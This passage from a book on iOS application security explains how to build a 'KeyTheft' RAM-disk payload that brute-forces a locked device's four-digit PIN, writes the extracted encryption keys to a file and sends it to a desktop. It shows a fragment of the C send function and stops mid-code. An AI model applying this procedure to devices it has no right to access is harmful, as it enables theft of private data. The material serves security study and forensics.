Hacking and Securing iOS Applications by Jonathan Zdziarski

Extracting Encryption Keys

Before decrypting information using the data protection tools, you must first extract the encryption keys from the device. The bruteforce tool you compiled earlier runs on a locked iOS device and attempts to brute force the four-digit PIN by calling low-level functions to try all 10,000 possible combinations. To use the brute force tool, you’ll incorporate it as a payload with the RawTheft payload you built in Chapter 3.

The KeyTheft Payload

In this example, Sogeti’s brute force tool will be executed first by a custom launchd program, like previous RAM disks you’ve built. The brute force tool will perform its function and save the device’s encryption keys to a file named dataprotection.log in the root directory on the device. The custom payload program will then be executed. It will listen for an incoming connection from the desktop and send this file when connected.

When launchd is run, the brute force tool will be executed first, followed by the custom payload. Your payload will expect that the output of the brute force tool will already be available and written to /dataprotection.log. Copy the payload.c file you created in Chapter 3’s RawTheft example. Change the send_data function to specify the path /dataprotection.log instead of the path to the raw disk device. This will cause the output of the brute force tool to be sent instead.

int send_data(int wfd) {
    int r;
    printf("sending /dataprotection.log...\n");
    r = send_file(wfd, "/dataprotection.log");
    if ...